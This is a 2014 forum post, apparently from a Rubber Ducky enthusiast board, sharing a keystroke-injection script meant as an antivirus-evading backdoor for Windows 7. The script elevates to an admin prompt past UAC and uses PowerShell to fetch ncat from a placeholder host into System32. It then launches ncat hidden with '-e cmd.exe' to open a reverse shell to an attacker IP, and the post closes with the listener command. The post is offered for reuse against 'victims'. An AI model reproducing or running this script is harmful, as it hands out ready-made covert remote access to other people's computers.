Grimsoul Posted November 7, 2014 Posted November 7, 2014 Just picked up my rubber ducky and thought i'd contribute a bit. (First post btw , Hi!)So we all know that netcat gets picked up by most anti-virus (ratio of about 23/53 ratio) which makes using it as a backdoor slightly challenging.After doing some reading , I figured out that ncat (by nmap) , a moderized version of ncat only had a ratio of 4/53 and was undetected by a lot of major anti-virus programs.So here is a (relatively) undetected backdoor to any windows 7 machine, coded from scratch by yours truly. By no means complicated or innovative at all.For this attack , we download a copy of ncat on the victims machine and run it silently.You can pick up a portable exe of ncat straight from the developers website (1.5 mb) here.ncat , unlike netcat doesn't run in the background like netcat does (requires a cmd to be open to keep the connection alive) so I used so crafty powershell arguments to force it into the background.The rest is explained in the comments. You can compare the AV results between netcat and ncat here: VirusTotal ncat results (Picked up by norton though , sucks i know) VirusTotal netcat results Please feel free to adapt this for your own tailored needs, be it persistence , no-download (twin-duck) or hidden cmd window. - GrimsouL REM --Windows shell undetected by AV (Ncat Download required) WIN7/UAC-- by: GrimSouL 11/7/2014 REM //This delay required on my PC before attempting to get start menu , may not be required on yours/target. DELAY 1000 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU REM //This dely is long because in my machine right clicking certain things takes a long time (many menu options) , adjust as needed. DELAY 1000 STRING a DELAY 200 REM //This enter required for my PC, i've seen alot of scripts where this is omitted but the 'a' above only selects the 'Run as admin' on my machine , hence we need an enter to actually 'click' it ENTER REM //This delay may need to be adjusted depending on machine. Sometimes takes long due to background dimming DELAY 700 LEFTARROW DELAY 400 ENTER DELAY 700 REM //Simple powershell to download ncat portable. You can see it's a .txt extension because most hosters dont allow .exe files. So we change the extension of ncat to a .txt and upload it then rename it back to an exe after download STRING powershell (new-object System.Net.WebClient).DownloadFile('http://yourhost.com/yourPayload.txt','%WINDIR%\System32\yourPayload.exe') ENTER REM //This delay is set to 10 seconds to wait for the downloaded file. Adjust as needed for your/targets connection speed.(ncat = 1.58MB) DELAY 10000 ENTER REM //Where the magic happens , we run the downloaded ncat exe , since ncat doesn't run in the background , we use a powershell argument to make it so. STRING powershell Start-Process -WindowStyle hidden -FilePath %WINDIR%\System32\payloadEn.exe -ArgumentList '<attackerIP> <attackerPORT> -e cmd.exe' ENTER REM // We exit our powershell , however ncat runs silently leaving us with a clean getaway STRING exit ENTER To run our listener on the attacker machine ncat -l <ATTACKER IP> -p <ATTACKER PORT> -v Quote
Grimsoul Posted November 8, 2014 Author Posted November 8, 2014 This also works on x64 machines , unlike the base64 payload that uses a vb script. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.